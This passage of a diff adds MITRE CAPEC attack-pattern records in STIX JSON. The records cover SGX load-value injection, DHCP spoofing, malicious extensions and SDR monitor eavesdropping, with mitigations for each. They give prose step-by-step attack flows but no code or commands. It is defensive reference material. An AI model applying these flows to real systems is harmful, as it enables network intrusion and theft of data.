"Bypass Protection Mechanism" + ], + "Authorization": [ + "Execute Unauthorized Commands" + ], + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware", + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey target application and relevant OS shared code libraries: Adversary identifies vulnerable transient instruction sets and the code/function calls to trigger them as well as instruction sets or code fragments (gadgets) to perform attack. The adversary looks for code gadgets which will allow them to load an adversary-controlled value into trusted memory. They also look for code gadgets which might operate on this controlled value.

    2. Techniques
    Utilize Disassembler and Debugger tools to examine and trace instruction set execution of source code and shared code libraries on a system.

Experiment

  1. Fill microarchitectural buffer with controlled value: The adversary will utilize the found code gadget from the previous step to load a value into a microarchitectural buffer.

    2. Techniques
    The adversary may choose the controlled value to be memory address of sensitive information that they want the system to access
    The adversary may choose the controlled value to be the memory address of other code gadgets that they wish to execute by hijacking the control flow of the system

  2. Set up instruction to page fault or microcode assist: The adversary must manipulate the system such that a page fault or microcode assist occurs when a valid instruction is run. If the instruction that fails is near where the adversary-controlled value was loaded, the system may forward this value from the microarchitectural buffer incorrectly.

    3. Techniques
    When targeting Intel SGX enclaves, adversaries that have privileges can manipulate PTEs to provoke page-fault exceptions or microcode assists.
    When targeting Intel SGX enclaves, adversaries can indirectly revoke permissions for enclave code through the “mprotect” system call
    An adversary can evict selected virtual memory pages using legacy interfaces or by increasing physical memory utilization
    When attacking a Windows machine, wait until the OS clears the PTE accessed bit. When the page is next accessed, the CPU will always issue a microcode assist for re-setting this bit

Exploit

  1. Operate on adversary-controlled data: Once the attack has been set up and the page fault or microcode assist occurs, the system operates on the adversary-controlled data.

    2. Techniques
    Influence the system to load sensitive information into microarchitectural state which can be read by the adversary using a code gadget.
    Hijack execution by jumping to second stage gadgets found in the address space. By utilizing return-oriented programming, this can chain gadgets together and allow the adversary to execute a sequence of gadgets.
", + "x_capec_extended_description": "This attack is a mix of techniques used in traditional Meltdown and Spectre attacks. It uses microarchitectural data leakage combined with code gadget abuse. Intel has identified that this attack is not applicable in scenarios where the OS and the VMM (Virtual Memory Manager) are both trusted. Because of this, Intel SGX is a prime target for this attack because it assumes that the OS or VMM may be malicious.", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary needs at least user execution access to a system and a maliciously crafted program/application/process with unprivileged code to misuse transient instruction set execution of the CPU.", + "The CPU incorrectly transiently forwards values from microarchitectural buffers after faulting or assisted loads", + "The adversary needs the ability to induce page faults or microcode assists on the target system.", + "Code gadgets exist that allow the adversary to hijack transient execution and encode secrets into the microarchitectural state." + ], + "x_capec_skills_required": { + "High": "The ability to provoke faulting or assisted loads in legitimate execution." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not allow the forwarding of data resulting from a faulting or assisted instruction. Some current mitigations claim to zero out the forwarded data, but this mitigation still does not suffice.", + "id": "course-of-action--3054fecd-c70d-453d-a8f6-ec4f7267f82c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-696-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--18a401b9-c208-4087-b1f4-82a622a57c52", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3054fecd-c70d-453d-a8f6-ec4f7267f82c", + "target_ref": "attack-pattern--f4d86f88-864b-4d41-9077-1f15f1db08c3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Insert explicit “lfence” speculation barriers in software before potentially faulting or assisted loads. This halts transient execution until all previous instructions have been executed and ensures that the architecturally correct value is forwarded.", + "id": "course-of-action--9b586561-3569-4a6a-a770-afffe4cedb33", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-696-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4c0a1cbd-bba1-4e83-beb8-80276fc66192", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9b586561-3569-4a6a-a770-afffe4cedb33", + "target_ref": "attack-pattern--f4d86f88-864b-4d41-9077-1f15f1db08c3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary masquerades as a legitimate Dynamic Host Configuration Protocol (DHCP) server by spoofing DHCP traffic, with the goal of redirecting network traffic or denying service to DHCP.\n ", + "external_references": [ + { + "external_id": "CAPEC-697", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/697.html" + }, + { + "external_id": "CWE-923", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/923.html" + }, + { + "description": "Adversary-in-the-Middle: DHCP Spoofing", + "external_id": "T1557.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1557/003" + }, + { + "description": "Yuval Lazar, DHCP Spoofing 101, 2021--11---03, Pentera", + "external_id": "REF-737", + "source_name": "reference_from_CAPEC", + "url": " https://pentera.io/blog/dhcp-spoofing-101" + }, + { + "description": "T. Melsen, S. Blake, Ericsson, DHCP Spoofing 101, 2006--06, The Internet Society", + "external_id": "REF-738", + "source_name": "reference_from_CAPEC", + "url": "https://www.rfc-editor.org/rfc/rfc4562.html" + }, + { + "description": "Bosco Sebastian, DHCP Spoofing 101, 2019--08---02, McAfee", + "external_id": "REF-739", + "source_name": "reference_from_CAPEC", + "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/dhcp-client-remote-code-execution-vulnerability-demystified/" + } + ], + "id": "attack-pattern--67cf8bc2-3d17-4ecf-b52e-febdb7804a37", + "modified": "2022-09-29T00:00:00.000Z", + "name": "DHCP Spoofing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_precede_refs": [ + "attack-pattern--897a5506-45bb-4f6f-96e7-55f4c0b9021a", + "attack-pattern--38964770-4f39-4191-89cf-73a625162b2b" + ], + "x_capec_child_of_refs": [ + "attack-pattern--862d18f1-a87c-4f1b-acc2-882697d5d6e5" + ], + "x_capec_consequences": { + "Access_Control": [ + "Modify Data", + "Execute Unauthorized Commands" + ], + "Availability": [ + "Resource Consumption" + ], + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Social Engineering", + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "In early 2019, Microsoft patched a critical vulnerability (CVE-2019-0547) in the Windows DHCP client which allowed remote code execution via crafted DHCP OFFER packets. [REF-739]" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine Exsisting DHCP lease: An adversary observes network traffic and waits for an existing DHCP lease to expire on a target machine in the LAN.

    2. Techniques
    Adversary observes LAN traffic for DHCP solicitations

Experiment

  1. Capture the DHCP DISCOVER message: The adversary captures \"DISCOVER\" messages and crafts \"OFFER\" responses for the identified target MAC address. The success of this attack centers on the capturing of and responding to these \"DISCOVER\" messages.

    2. Techniques
    Adversary captures and responds to DHCP \"DISCOVER\" messages tailored to the target subnet.

Exploit

  1. Compromise Network Access and Collect Network Activity: An adversary successfully acts as a rogue DHCP server by redirecting legitimate DHCP requests to itself.

    2. Techniques
    Adversary sends repeated DHCP \"REQUEST\" messages to quickly lease all the addresses within network's DHCP pool and forcing new DHCP requests to be handled by the rogue DHCP server.
", + "x_capec_extended_description": "\n DHCP is broadcast to the entire Local Area Network (LAN) and does not have any form of authentication by default. Therefore, it is susceptible to spoofing.\n An adversary with access to the target LAN can receive DHCP messages; obtaining the topology information required to potentially manipulate other hosts' network configurations.\n To improve the likelihood of the DHCP request being serviced by the Rogue server, an adversary can first starve the DHCP pool.\n ", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary must have access to a machine within the target LAN which can send DHCP offers to the target." + ], + "x_capec_resources_required": [ + "The adversary requires access to a machine within the target LAN on a network which does not secure its DHCP traffic through MAC-Forced Forwarding, port security, etc." + ], + "x_capec_skills_required": { + "Medium": "The adversary must identify potential targets for DHCP Spoofing and craft network configurations to obtain the desired results." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: MAC-Forced Forwarding", + "id": "course-of-action--98de0edc-dd38-44d1-9f6f-0ceaa61fa7d0", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-697-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5d5c73ef-a153-438a-8052-fb0d415d37f9", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--98de0edc-dd38-44d1-9f6f-0ceaa61fa7d0", + "target_ref": "attack-pattern--67cf8bc2-3d17-4ecf-b52e-febdb7804a37", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Port Security and DHCP snooping", + "id": "course-of-action--0bb278f4-3628-416a-8686-c55572ab5d65", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-697-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d87cf77e-7197-4f15-a744-bbd9840ea6d4", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0bb278f4-3628-416a-8686-c55572ab5d65", + "target_ref": "attack-pattern--67cf8bc2-3d17-4ecf-b52e-febdb7804a37", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Network-based Intrusion Detection Systems", + "id": "course-of-action--cab0ed33-e641-416d-9959-6197f786a075", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-697-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d86362d1-fe04-4931-a0e3-56adbd075ab6", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--cab0ed33-e641-416d-9959-6197f786a075", + "target_ref": "attack-pattern--67cf8bc2-3d17-4ecf-b52e-febdb7804a37", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary directly installs or tricks a user into installing a malicious extension into existing trusted software, with the goal of achieving a variety of negative technical impacts.\n ", + "external_references": [ + { + "external_id": "CAPEC-698", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/698.html" + }, + { + "external_id": "CWE-507", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/507.html" + }, + { + "external_id": "CWE-829", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/829.html" + }, + { + "description": "Browser Extensions", + "external_id": "T1176", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1176" + }, + { + "description": "Server Software Component: IIS Components", + "external_id": "T1505.004", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1505/004" + }, + { + "description": "Robert Falcone, OilRig uses RGDoor IIS Backdoor on Targets in the Middle East, 2018--01---25, Palo Alto Networks", + "external_id": "REF-740", + "source_name": "reference_from_CAPEC", + "url": "https://unit42.paloaltonetworks.com/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/" + }, + { + "description": "ASERT Team, STOLEN PENCIL Campaign Targets Academia, 2018--12---05, NETSCOUT", + "external_id": "REF-741", + "source_name": "reference_from_CAPEC", + "url": "https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia" + } + ], + "id": "attack-pattern--c253fd5b-9ae6-4f42-868a-52b25b7dd1f4", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Install Malicious Extension", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--482cb9fc-0122-49f0-b6df-6d2d42098b0a" + ], + "x_capec_consequences": { + "Access_Control": [ + "Execute Unauthorized Commands", + "Alter Execution Logic", + "Gain Privileges" + ], + "Authorization": [ + "Execute Unauthorized Commands", + "Alter Execution Logic", + "Gain Privileges" + ], + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n In January 2018, Palo Alto's Unit 42 reported that a malicious Internet Information Services (IIS) extension they named RGDoor was used to create a backdoor into several Middle Eastern government organizations, as well as a financial institution and an educational institution. This malware was used in conjunction with the TwoFace webshell and allowed the adversaries to upload/download files and execute unauthorized commands. [REF-740]\n ", + "\n In December 2018, it was reported that North Korea-based APT Kimusky (also known as Velvet Chollima) infected numerous legitimate academic organizations within the U.S., many specializing in biomedical engineering, with a malicious Google Chrome extension. Dubbed \"Operation STOLEN PENCIL\", the attack entailed conducting spear-phishing attacks to trick victims into installing a malicious PDF reader named \"Auto Font Manager\". Once installed, the malware allowed adversaries to steal cookies and site passwords, as well as forward emails from some compromised accounts. [REF-741]\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify target(s): The adversary must first identify target software that allows for extensions/plugins and which they wish to exploit, such as a web browser or desktop application. To increase the attack space, this will often be popular software with a large user-base.

Experiment

  1. Create malicious extension: Having identified a suitable target, the adversary crafts a malicious extension/plugin that can be installed by the underlying target software. This malware may be targeted to execute on specific operating systems or be operating system agnostic.

Exploit

  1. Install malicious extension: The malicious extension/plugin is installed by the underlying target software and executes the adversary-created malware, resulting in a variety of negative technical impacts.

    2. Techniques
    Adversary-Installed: Having already compromised the target system, the adversary simply installs the malicious extension/plugin themself.
    User-Installed: The adversary tricks the user into installing the malicious extension/plugin, via means such as social engineering, or may upload the malware on a reputable extension/plugin hosting site and wait for unknowing victims to install the malicious component.
", + "x_capec_extended_description": "\n Many software applications allow users to install third-party software extensions/plugins that provide additional features and functionality. Adversaries can take advantage of this behavior to install malware on a system with relative ease. This may require the adversary compromising a system and then installing the malicious extension themself. An alternate approach entails masquerading the malicious extension as a legitimate extension. The adversary then convinces users to install the malicious component, via means such as social engineering, or simply waits for victims to unknowingly install the malware on their systems. Once the malicious extension has been installed, the adversary can achieve a variety of negative technical impacts such as obtaining sensitive information, executing unauthorized commands, observing/modifying network traffic, and more.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The adversary must craft malware based on the type of software and system(s) they intend to exploit.", + "If the adversary intends to install the malicious extension themself, they must first compromise the target machine via some other means." + ], + "x_capec_skills_required": { + "Medium": "Optional: Ability to exploit target system(s) via other means in order to gain entry." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Only install extensions/plugins from official/verifiable sources.", + "id": "course-of-action--aacf7ddd-d5f7-405b-a08c-c17e40ddea15", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-698-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b0b5c230-fac9-4388-84ba-79f82c3f54f8", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--aacf7ddd-d5f7-405b-a08c-c17e40ddea15", + "target_ref": "attack-pattern--c253fd5b-9ae6-4f42-868a-52b25b7dd1f4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Confirm extensions/plugins are legitimate and not malware masquerading as a legitimate extension/plugin.", + "id": "course-of-action--26c55e54-7980-4381-9787-85f4fc056efb", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-698-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8732c1a9-2c30-4a0f-a85e-eba86afae50e", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--26c55e54-7980-4381-9787-85f4fc056efb", + "target_ref": "attack-pattern--c253fd5b-9ae6-4f42-868a-52b25b7dd1f4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure the underlying software leveraging the extension/plugin (including operating systems) is up-to-date.", + "id": "course-of-action--ea4f7fab-a15b-416d-8728-60b9eed0505f", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-698-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9174facf-ad92-4cd1-a458-5bfefa5756d4", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ea4f7fab-a15b-416d-8728-60b9eed0505f", + "target_ref": "attack-pattern--c253fd5b-9ae6-4f42-868a-52b25b7dd1f4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implement an extension/plugin allow list, based on the given security policy.", + "id": "course-of-action--eba8ec2c-d600-423e-a463-27584e2ab7ab", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-698-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b0fe03f4-b8ab-475f-b1bb-568643d808fd", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--eba8ec2c-d600-423e-a463-27584e2ab7ab", + "target_ref": "attack-pattern--c253fd5b-9ae6-4f42-868a-52b25b7dd1f4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "If applicable, confirm extensions/plugins are properly signed by the official developers.", + "id": "course-of-action--1b8f20d5-595c-4723-84eb-403cf9dad6b5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-698-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--211d3a26-d73e-4aba-87e1-527adbc75e74", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1b8f20d5-595c-4723-84eb-403cf9dad6b5", + "target_ref": "attack-pattern--c253fd5b-9ae6-4f42-868a-52b25b7dd1f4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "For web browsers, close sessions when finished to prevent malicious extensions/plugins from executing the the background.", + "id": "course-of-action--37d2bc08-4639-4476-a9a2-771ef9e71e30", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-698-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--53622b2d-230c-42f4-bd8c-86e0d7048aa8", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--37d2bc08-4639-4476-a9a2-771ef9e71e30", + "target_ref": "attack-pattern--c253fd5b-9ae6-4f42-868a-52b25b7dd1f4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An Adversary can eavesdrop on the content of an external monitor through the air without modifying any cable or installing software, just capturing this signal emitted by the cable or video port, with this the attacker will be able to impact the confidentiality of the data without being detected by traditional security tools", + "external_references": [ + { + "external_id": "CAPEC-699", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/699.html" + }, + { + "external_id": "CWE-1300", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1300.html" + }, + { + "description": "TempestSDR: An SDR Tool For Eavesdropping on Computer Screens Via Unintentionally Radiated RF", + "external_id": "REF-744", + "source_name": "reference_from_CAPEC", + "url": "https://www.rtl-sdr.com/tempestsdr-a-sdr-tool-for-eavesdropping-on-computer-screens-via-unintentionally-radiated-rf/" + }, + { + "description": "Dan Maloney, Exposing Computer Monitor Side-Channel Vulnerabilities with TempestSDR", + "external_id": "REF-745", + "source_name": "reference_from_CAPEC", + "url": "https://hackaday.com/2020/07/15/exposing-computer-monitor-side-channel-vulnerabilities-with-tempestsdr/" + } + ], + "id": "attack-pattern--0a8ef002-1cb8-46e1-bc44-efd0a39b2a67", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Eavesdropping on a Monitor", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_child_of_refs": [ + "attack-pattern--94e596d2-6844-4031-80c3-8522642aaff8" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey Target: The adversary surveys the target location, looking for exposed display cables and locations to hide an SDR. This also includes looking for display cables or monitors placed close to a wall, where the SDR can be in range while behind the wall. The adversary also attempts to discover the resolution and refresh rate of the targeted display.

Experiment

  1. Find target using SDR: The adversary sets up an SDR near the target display cable or monitor. They use the SDR software to locate the corresponding frequency of the display cable. This is done by looking for interference peaks that change depending on what the screen is showing. The adversary notes down the possible frequencies of unintentional emission.

    2. Techniques
    An adversary can make use of many different commercially available SDR devices which are easy to setup such as a HackRF, Ubertooth, RTL-SDR, and many others.

Exploit

  1. Visualize Monitor Image: Once the SDR software has been used to identify the target, the adversary will record the transmissions and visualize the monitor image using these transmissions, which allows them to eavesdrop on the information visible on the monitor.

    2. Techniques
    The TempestSDR software can be used in conjunction an SDR device to visualize the monitor image. The adversary will specify the known monitor resolution and refresh rate, or if those are not known they can use the provided auto-correlation graphs to help predict these values. The adversary will then try the different frequencies recorded from the experiment phase, looking for a viewing monitor display. Low pass filters and gain can be manipulated to make the display image clearer.
", + "x_capec_extended_description": "\n This attack gives the adversary the ability to view an external monitor with an insignificant delay. There is also no indicator of compromise from the victim visible on the monitor.\n The eavesdrop is possible due to a signal leakage, that is produced at different points of the connection, including the source port, the connection between the cable and PC, the cable itself, and the connection between the cable and the monitor. That signal leakage can be captured near any of the leak points, but also in a near location, like the next room or a few meters away, using an SDR (Software-defined Radio) device and the correspondent software, that process and interpret the signal to show attackers what the monitor is displaying.\n From the victim’s point of view, this specified attack might cause a high risk, and from the other hand, from the attacker’s point of view, the attack is excellent, since the specified attack method can be used without investing too much effort or require too many skills, as long as the right attack tool is in right place, this allows attackers to completely compromise the confidentiality of the data; also giving the attacker the advantage of being undetectable by not only traditional security products but also from bug sweep because the SDR device is acting in passive mode.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Victim should use an external monitor device", + "Physical access to the target location and devices" + ], + "x_capec_resources_required": [ + "SDR device set with the correspondent antenna", + "Computer with SDR Software" + ], + "x_capec_skills_required": { + "Low": "Understanding of computing hardware, to identify the video cable and video ports", + "Medium": "Knowledge of how to use the SDR and related software: With this knowledge, the adversary will find the correct frequency where the signal is being leaked" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Enhance: Increase the number of electromagnetic shield layers in the display ports and cables to contain or reduce the intensity of the leaked signal.", + "id": "course-of-action--4c0077be-4137-4ecd-af5b-833fe09c74f0", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-699-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a414f123-2b57-4f79-86c4-43cb1640b898", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4c0077be-4137-4ecd-af5b-833fe09c74f0", + "target_ref": "attack-pattern--0a8ef002-1cb8-46e1-bc44-efd0a39b2a67", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implement: Use a protocol that encrypts the video signal; in case the signal is intercepted the signal is protected by the encryption.", + "id": "course-of-action--99ccf3d5-4c15-4adb-9806-07bac3ee35cf", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-699-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8e639e3d-9aeb-4937-b1b2-af26990dfbb7", + "modified": 